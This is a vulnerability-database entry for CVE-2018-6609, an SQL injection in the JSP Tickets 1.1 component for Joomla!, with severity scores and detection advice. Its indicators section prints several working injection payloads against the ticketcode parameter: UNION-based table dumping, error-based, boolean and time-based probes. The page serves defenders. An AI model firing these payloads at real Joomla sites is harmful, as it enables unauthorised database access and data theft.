CVE-2018-6609
published 2018-02-05CVE-2018-6609: SQL Injection exists in the JSP Tickets 1.1 component for Joomla! via the ticketcode parameter in a ticketlist edit action, or the id parameter in a statuslist…
PriorityP261critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.70%
84.1th percentile
SQL Injection exists in the JSP Tickets 1.1 component for Joomla! via the ticketcode parameter in a ticketlist edit action, or the id parameter in a statuslist (or prioritylist) edit action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jsp_tickets_project | jsp_tickets | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command-66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari↗
commandoption=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe↗
commandoption=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD↗
commandoption=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir↗
commandoption=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG↗
- →Monitor GET requests targeting `option=com_jsptickets` with `controller=ticketlist&task=edit` and inspect the `ticketcode` parameter for SQL metacharacters (quotes, UNION, SLEEP, comment sequences). ↗
- →Monitor GET requests targeting `option=com_jsptickets` with `controller=statuslist&task=edit` or `controller=prioritylist&task=edit` and inspect the `id` parameter for SQL injection payloads. ↗
- →Detect MySQL comment-obfuscated UNION injection pattern `/*!07777UNION*/` and `/*!07777SELECT*/` in HTTP query strings targeting the JSP Tickets component. ↗
- →Alert on time-based blind SQLi probes: presence of `SLEEP(5)` in the `ticketcode`, `id` parameters of com_jsptickets requests, combined with abnormal response latency. ↗
- →Detect error-based SQLi using FLOOR(RAND(0)*2) with INFORMATION_SCHEMA.PLUGINS GROUP BY in requests to com_jsptickets endpoints. ↗
- ·All exploit payloads target version 1.1 of the JSP Tickets component specifically; other versions are not confirmed vulnerable. ↗
- ·The PoC URLs use `localhost` as a placeholder; the actual target path (`[PATH]`) must be substituted with the real Joomla installation path when writing detection signatures. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2018-02-05
Published